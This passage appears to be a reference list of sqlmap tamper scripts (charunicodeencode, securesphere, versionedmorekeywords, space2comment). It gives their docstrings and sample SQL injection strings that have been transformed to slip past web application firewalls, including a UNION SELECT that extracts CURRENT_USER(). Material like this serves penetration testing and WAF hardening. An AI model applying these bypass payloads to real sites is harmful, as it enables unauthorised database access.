'I/**/N/**/SERT'
"""

charunicodeencode.py

Purpose: Unicode-URL-encodes the payload (the %uXXXX form understood by ASP / ASP.NET)

Case 1:
http://www.wooyun.org/bugs/wooyun-2010-074261

Docstring from the script:
"""
Unicode-url-encodes non-encoded characters in a given payload (not
processing already encoded)

Requirement:
    * ASP
    * ASP.NET

Tested against:
    * Microsoft SQL Server 2000
    * Microsoft SQL Server 2005
    * MySQL 5.1.56
    * PostgreSQL 9.0.3

Notes:
    * Useful to bypass weak web application firewalls that do not
      unicode url-decode the request before processing it through their
      ruleset

>>> tamper('SELECT FIELD%20FROM TABLE')
'%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'
"""

securesphere.py

Purpose: appends a specially crafted string

Docstring from the script:
"""
Appends special crafted string

Notes:
    * Useful for bypassing Imperva SecureSphere WAF
    * Reference: http://seclists.org/fulldisclosure/2011/May/163

>>> tamper('1 AND 1=1')
"1 AND 1=1 and '0having'='0having'"
"""

versionedmorekeywords.py

Purpose: MySQL versioned-comment bypass, e.g. /*!UNION*/
[mysql] only

Docstring from the script:
"""
Encloses each keyword with versioned MySQL comment

Requirement:
    * MySQL >= 5.1.13

Tested against:
    * MySQL 5.1.56, 5.5.11

Notes:
    * Useful to bypass several web application firewalls when the
      back-end database management system is MySQL

>>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#')
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'
"""

space2comment.py

Purpose: replaces each space with /**/

Docstring from the script:
"""
Replaces space character (' ') with comments '/**/'

Tested against:
    * Microsoft SQL Server 2005
    * MySQL 4, 5.0 and 5.5
    * Oracle 10g
    * PostgreSQL 8.3, 8.4, 9.0

Notes:
    * Useful to bypass weak and bespoke web application firewalls

>>> tamper('SELECT id FROM users')
'SELECT/**/id/**/FROM/**/users'
"""

Case 1: http://www.wooyun.org/bugs/wooyun-2010-046496

